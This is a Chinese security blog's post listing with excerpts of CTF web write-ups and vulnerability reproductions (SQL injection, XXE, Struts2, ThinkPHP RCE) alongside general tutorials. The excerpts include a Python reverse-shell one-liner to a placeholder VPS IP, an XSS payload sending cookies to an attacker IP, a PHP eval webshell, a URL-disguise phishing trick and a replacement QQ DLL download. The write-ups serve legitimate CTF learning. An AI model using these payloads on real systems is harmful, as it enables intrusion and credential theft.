自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(66)
  • 资源 (3)
  • 收藏
  • 关注

原创 快速删除B站的关注列表

如何快速删除B站的关注列表

2022-08-22 17:20:33 3421 1

原创 openpyxl在excel中插入多张图片

今天在写爬虫时,希望将一些图片一并放入excel,但是使用openpyxl操作后,最后的保存结果只剩一张图。经过多次测试,最终发现每次插入图片时需要重新加载一次图片。代码如下:import osimport openpyxlfrom openpyxl.drawing.image import Imagepath = os.getcwd()wb = openpyxl.load_workbook(path+'/start/start.xlsx') #打开excelsheet = wb.works

2022-01-13 21:04:31 1593

原创 记一个python反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("你的VPSIP",端口号));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

2021-11-19 23:26:39 2895

原创 使用Mirai框架搭建QQ机器人

框架准备前言服务器操作系统: CentOS 8ubuntu系统好像会出问题,不推荐使用ubuntu,搭建了三次全部失败,故此放弃。服务器python版本:3.8.2安装OpenJDKyum install java-11-openjdk.x86_64 -y这里就安装这个版本安装MCLRelease下载完之后直接cd进对应目录sh mcl可以登陆,完事,接下来配置python下载python使用wget下载Python-3.8.2包wget https://www.pyt

2021-09-14 21:35:46 2284 1

原创 震惊!PC端QQ也能防撤回?

首先,打开QQ所在文件的位置:将所给文件IM.dll文件复制进当前目录,替换掉原来的IM.dll:重启QQ就可以啦!文件下载链接如下:https://download.csdn.net/download/satasun/19242892

2021-05-30 21:18:59 3481

原创 easy_sql

easy_sql判断注入类型(字符型注入/数字型输入)http://hwserver.bi0x.cn:8302/?id=1 and 1=1#发现是数字型注入判断字段数http://hwserver.bi0x.cn:8302/?id=1 order by 3#判断注入点http://hwserver.bi0x.cn:8302/?id=0 union select 1,2,3#1 2 3都是注入点爆库名http://hwserver.bi0x.cn:8302/?id=0 uni

2021-04-19 17:42:44 547 1

原创 ubuntu server搭建python+selenium

ubuntu+python+selenium前言写这篇博客之前,我在网上找了一堆ubuntu上搭建selenium+浏览器的环境,有chrome、Firefox、phantomjs。最后在重装了n次服务器后,搭建成功了,在这里记录一下。selenium安装传送门这篇知乎是我见过的介绍selenium比较全的文章了,大家可以参考一下哈。phantomjs安装phantomjs官网wget https://bitbucket.org/ariya/phantomjs/downloads/phant

2021-01-27 22:28:20 1286

原创 一道题讲懂SQL盲注 / [第一章 web入门]SQL注入-2

概述本题是一个盲注题,可以基于布尔也可以基于时间,如果不会的话可以根据提示在网址后面加一个?tips=1降低难度成为一个基于报错的盲注。解法一:基于时间直接在前端进行注入的话没有报错回显,所以需要抓个包然后开始测试。测库名首先测试库名长度name=1'+or+if(length(database())=4,sleep(1),1)#&pass=asdasd等了3秒,我们默认是sleep1秒,但是不知道为什么睡的时间是输入的3-4倍左右,不管了,反正长度是4(1-4慢慢试)然后测试

2020-12-13 20:09:10 2047 7

原创 [struts2]s2-001

[struts2]s2-001环境搭建Githubbuuctfpoc该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行测试一下:exp获取Tomcat执行路径:%{@java.lang.Syste

2020-12-09 20:17:38 232

原创 [struts2]s2-013 漏洞复现

[struts2]s2-013环境搭建githubbuuctfpocStruts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下:none - 链接不包含请求的任意参数值(默认)get - 链接只包含 GET 请求中的参数和其值all - 链接包含 GET 和 POST 所有参数和其值<s:a>用来显示一个超链接,当includeParams=a

2020-12-09 18:59:19 502

原创 phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)漏洞复现

(CVE-2018-12613)环境搭建github传送门BUU传送门

2020-12-07 20:38:11 218

原创 [ThinkPHP]2-Rce 复现

[ThinkPHP]2-Rce 复现环境搭建github传送门BUU传送门POC老懒狗选择buuhttp://node3.buuoj.cn:26104/pochttp://node3.buuoj.cn:26104?s=/index/index/name/$%7B@phpinfo()%7Dexp我试了一下直接用system调用命令好像不行,可能因为中间掺杂了一些符号,这边利用eval函数进行绕过。http://node3.buuoj.cn:26104/?s=/index/index

2020-12-07 16:21:23 1423

原创 [ThinkPHP]5.0.23-Rce 漏洞复现

[ThinkPHP]5.0.23-Rce环境搭建github传送门BUU传送门POC老懒狗选择直接buu,链接http://node3.buuoj.cn:27512/直接用poc打一下:POST /index.php?s=captcha HTTP/1.1Host: node3.buuoj.cn:27512Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (com

2020-12-07 14:57:14 3865

原创 Thinkphp5 任意代码执行漏洞复现

环境搭建环境搭建Github传送门BUU传送门菜鸡懒得动手直接上buu一键搭建环境http://node3.buuoj.cn:28078/POC首页已经提示thinkphp5了,笔者推荐一款比较好用的谷歌插件Wappalyzer直接分析出使用了php7.2.31(但是不懂为啥没分析出thinkPHP框架)直接百度thinkPHP任意代码执行漏洞大佬博客传送门poc:http://node3.buuoj.cn:28078/?s=index/think\app/invokefunc

2020-12-06 23:59:52 939

原创 [BJDCTF 2nd]xss之光

[BJDCTF 2nd]xss之光御剑看了一下url,输入啥都不对。掏出御剑直接扫,扫出一个.gitGitHack安排得到:<?php$a = $_GET['yds_is_so_beautiful'];echo unserialize($a);原生类反序列化参考构造payload:<?php$a = serialize(new Exception("<script>window.location.href='IP'+document.cookie</s

2020-11-27 14:56:09 169

原创 [BJDCTF2020]EasySearch

[BJDCTF2020]EasySearch御剑扫一波扫到一个index.php.swp<?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0

2020-11-27 14:11:03 165

原创 2020年极客大挑战WEB部分WP

WriteUPWelcome题目地址: http://49.234.224.119:8000/题目描述: 欢迎来到极客大挑战!访问题目链接,发现405报错。百度了一下,发现是GET或者POST请求出问题了。拿Postman试一下:看了一下需要POST上传一个roam1,roam2,这两个的值不能相等,哈希值要相等,好了,传入数组。因为各种哈希都无法对数组进行操作,会返回False。然后又因为False === False => True,所以顺利绕过~在phpinfo里面找找可以

2020-11-23 17:54:16 1668 1

原创 [CISCN2019 华北赛区 Day1 Web2]ikun

[CISCN2019 华北赛区 Day1 Web2]ikunshopping要买到lv6,然而当前页面上没有lv6,爆破页面来搞事情。import requestsurl="http://3ecc60d7-c14f-4805-9476-71bcd91747c8.node3.buuoj.cn/shop?page="for i in range(0,2000): print(i) r=requests.get( url + str(i) ) if 'lv6.png' in

2020-11-15 20:31:07 1478

原创 [NCTF2019]True XML cookbook

[NCTF2019]True XML cookbook爆破抓包爆破,想直接爆出密码。然鹅我天真了。XXE漏洞这里存在XXE漏洞,利用脚本直接打:构造:<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE hack [<!ENTITY file SYSTEM "file:///flag">]><user> <username>&admin;</username&gt

2020-11-15 17:37:41 355

原创 [极客大挑战 2019]FinalSQL

[极客大挑战 2019]FinalSQL先骂出题人出题人是真的狗,废话不多说先放最后爆破的结果:cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{01d295cf-0c9c-44db-98ca-c7877

2020-11-15 14:39:25 1986

原创 [网鼎杯 2020 朱雀组]Nmap

[网鼎杯 2020 朱雀组]Nmapnmap本题的考点是利用nmap的-oN写shell。nmap -oN xxx.txt先构造:' -oN w4ke.txt '返回了Host maybe down,然后访问一下w4ke.txt构造:' -oN w4ke.php <?php eval($_POST['w4ke']); ?> '返回了Hacker...fuzz了一下,发现了php被过滤,phtml可以用。于是构造:' -oN w4ke.phtml <?=

2020-11-14 16:24:44 176

原创 [WUSTCTF2020]朴实无华

[WUSTCTF2020]朴实无华robots.txt首先拿御剑扫一下(因为buu上的docker性能不太行,扫多了就崩,所以建议用dirsearch并带上延时)。扫出了个robots.txtmdzz假flag,傻逼玩意。在响应头里面有fl4g.php.<?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);highlight_file(__file__);//level 1if (i

2020-11-14 15:21:23 124

原创 [安洵杯 2019]easy_serialize_php

[安洵杯 2019]easy_serialize_php看源码对源码的一些解释已经注释在源码里了<?php$function = @$_GET['f'];function filter($img){ //这里会过滤这几个字符 $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return pre

2020-11-14 00:15:36 187

原创 [GWCTF 2019]我有一个数据库

[GWCTF 2019]我有一个数据库御剑扫一波http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/robots.txthttp://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/tbl_create.phphttp

2020-11-04 19:47:54 152

原创 [BJDCTF2020]ZJCTF,不过如此

[BJDCTF2020]ZJCTF,不过如此php伪协议源码如下<?phperror_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h

2020-11-02 20:56:14 157

原创 使用Docker搭建SQL注入靶场

Docker搭建SQL注入漏洞什么是DockerDocker又被叫做容器,使用教程参考我的博客:传送门如何搭建靶场这里以ubuntu上搭建docker为例首先下载docker:apt install docker.ioapt install docker-compose如何搭建web服务器一般来说比较推荐Apache,详细教程请查看我的博客如何写php文件以一个简单的php文件为例,如果有需要请自行增加功能。<?phperror_reporting(0);

2020-11-02 17:59:48 2565 1

原创 python一键搭ftp服务器

首先需要下载pyftpdlib模块:pip install pyftpdlib然后在命令行下输入:python -m pyftpdlib至此,ftp服务器已搭建完成,大概也就几十秒的样子······访问ftp://127.0.0.1:2121即可进入ftp服务器更多指令可以查看大佬博客。传送门...

2020-11-02 13:30:35 316

原创 域名伪装

参考链接这里利用了一个不算漏洞的漏洞:浏览器在解析URL的时候默认丢掉@前面的所有东西。比如https://[email protected]/shenjuxian不注意看的话会以为是百度的,其实跳转到了另一个网站,如果黑客在后面网站上挂马的话很容易就中招啦。这里两个网址,看起来花里胡哨的,那如果后面跟一个ip呢:https://[email protected]看起来就稍微不那么显眼啦ip中的点还是很难受,那就将它变为纯数字,计算方式如下:

2020-11-01 15:19:09 3562

原创 [SWPU2019]Web1

[SWPU2019]Web1这道题是个二次注入,做之前感觉挺难得,做完发现也就那么点东西。没错,还是参考了王叹之大佬的博客,神!来发广告首先以为是弱口令登录admin,试了一波BP爆破,无果。然后是SQLmap,无果。然后······是我瞎了我没看到注册······注册登录以后是一个打广告的界面:好像唯一的入口就是这个申请发布广告,看看咋回事。发现注入点点击广告详情来到了这个网页:?id=38盲猜是注入?猜测这里提取内容的语句是select * from xxx where

2020-10-30 20:41:01 1998 7

原创 [CISCN 2019 初赛]Love Math

考点这个题目主要考的是waf绕过以及RCE。先介绍几个php函数的作用base_convert() 函数:在任意进制之间转换数字。dechex() 函数:把十进制转换为十六进制。hex2bin() 函数:把十六进制值的字符串转换为 ASCII 字符。然后是一个知识点:php中可以把函数名通过字符串的方式传递给一个变量,然后通过此变量动态调用函数例如:$function = "phpinfo";$function();WP审计源码:<?phperror_reporting(0

2020-10-27 18:03:15 116

原创 [网鼎杯 2020 朱雀组]phpweb

解题过程如下抓包进来的页面不对劲,虽然不知道什么梗但是有一说一确实丑,如果注意一下还会发现这个页面在不断刷新,先抓个包看看。发现这里上传了两个参数,分别是func和p。获取源码func猜测是function,p应该是payload(猜的),那么简单明了的东西应该是一个调用func上传的函数名,参数采用p传上来的参数。于是构造:func=file_get_contents&p=index.php源码:<?php $disable_fun = array("exec"

2020-10-14 16:08:26 329

原创 Doc

解题过程如下首先写脚本爆破出md5,建议采用python或者php#coding:utf-8#python3import hashlibimport timet = time.time()l = 'qwertyuiopasdfghjklzxcvbnm'for i in l: for j in l: for k in l: for m in l: for n in l:

2020-10-11 17:05:03 73

原创 Docker简单使用教程

Docker 是一个开源的应用容器引擎,基于 Go 语言 并遵从 Apache2.0 协议开源。Docker 可以让开发者打包他们的应用以及依赖包到一个轻量级、可移植的容器中,然后发布到任何流行的 Linux 机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口(类似 iPhone 的 app),更重要的是容器性能开销极低。说白了就是一个开销更低,安装更便捷的虚拟机。这里介绍一点简单的Docker使用教程,详细教程参考菜鸟教程Docker 基本语法安装 DockerUbu

2020-09-29 01:10:07 219

原创 MySQL数据库基本操作

菜鸟教程传送门这里只做一些简单的摘记,如果想系统的学习或者针对某个模块进行学习还行参考菜鸟教程的链接。对数据库的操作主要讲究增、删、改、查,这里也以这个为大纲进行讲解。MySQL基本结构数据库首先要讲的是数据库,一个服务器往往有好几个数据库,像information_schema,mysql,performace_schema,phpmyadmin,sys是内置的库,然后像employ,wordfriend这两个数据库是我自己创建的。一个库里面可以放很多个表,是MySQL最大的一个存储单位。

2020-09-27 20:15:03 228

原创 使用Ubuntu搭建Web服务器

Docker 是一个开源的应用容器引擎,基于 Go 语言 并遵从 Apache2.0 协议开源。Docker 可以让开发者打包他们的应用以及依赖包到一个轻量级、可移植的容器中,然后发布到任何流行的 Linux 机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口(类似 iPhone 的 app),更重要的是容器性能开销极低。总而言之,Docker相当于在你的电脑上建了一个虚拟机...

2020-09-27 13:51:19 7600 3

原创 [BJDCTF 2nd]假猪套天下第一

本题思路主要是不断修改访问时候的各种请求头先抓个包进来是个登录界面,登陆进去了也没啥东西,就先试试抓包,抓出一个L0g1n.php访问L0g1n.php再次抓包这里告诉我们需要再等99年,然后考虑到那边有一个time参数,应该就是把那个time改的超过9年就行。改XFF(X-Forwarded-For)加了一堆数字,然后提示需要localhost(本地),添加一个XFF为127.0.0.1就行改Client-ip改了XFF后提示不行,那就用Client-ip试试改Refere

2020-09-22 18:16:25 180

原创 [安洵杯 2019]easy_web

首先这个链接长得挺奇怪的,img参数后面跟的有点像base64编码。解码后得到MzUzNTM1MmU3MDZlNjc=这个还是base64,再次解码得到3535352e706e67这玩意看起来有点像十六进制,转一下字符串,得到555.png查看一下源码,发现有一堆base64,解成图片就是页面上的表情包。猜测img参数的作用就是将对象包含并进行转16进制再base64编码后输出,试一试包含index.phpindex.php696e6465782e706870Njk2ZTY0NjU3ODJ

2020-09-21 20:20:05 1730

原创 [GXYCTF2019]禁止套娃

这个题目主要是无参数RCE,看到题目人都傻了,看了一下大佬的博客差不多懂了。大佬博客首先用御剑扫一下,得到了Git泄露的线索。git一下得到源码:<?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';'

2020-09-14 16:55:11 181

原创 Ubuntu上使用docker部署flask项目记录

上课的时候老是让我们写了个词频统计网站,我用flask做后台,写完后发现不会部署,直接在服务器段搭建apache2和nginx都没成功,最后采用了docker的方式进行操作。以下记录当时的操作。首先用Xftp将文件上传到服务器端,然后将项目文件放到某一个文件夹(我放在了/home/app下)文件目录如下:注意,app所在的文件命名为main.py,不然用不了(我整了半天才发现不是main不能用)然后下载所需要的环境。这里我们需要python3.6以上环境(一般linux系统默认带pyt

2020-09-11 17:13:59 601

原创 2020暑期集训WEB部分WriteUp

题目名称:WEB签到题目描述:你知道多少HTTP请求头?flag:flag{mZ3YAsfPLN1g7fTDjb1khTLgbhLG1w}WriteUp解法一:BurpSuit访问链接,得到:意思是要上传一个Cookie,变量名为cookie(大小写不一样!!)这里可以用Hackbar解决:然后返回的结果是:原来cookie要等于i_need_flag这里需要用GET请求的方式上传一个名为&=&=&的变量,直接将变量名打在url后面肯定不行的,因为&am

2020-08-30 17:45:07 294

QQ防撤回组件之IM.dll

QQ防撤回组件之IM.dll

2021-05-30

基于新浪微博的大数据爬虫

使用selium、beautifulsoup、lxml库对微博的一个爬虫,解放双手,适合大数据分析。 未采用多线程,对服务器不造成太大压力。

2020-08-15

自动下载百度图片.py

改代码为基于python的网络爬虫,由用户提供关键字并运行脚本,爬虫自动在百度图片区下载相关图片。该代码未使用多线程技术,并不会对网络产生较大拥塞,故此分享。

2020-03-09

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除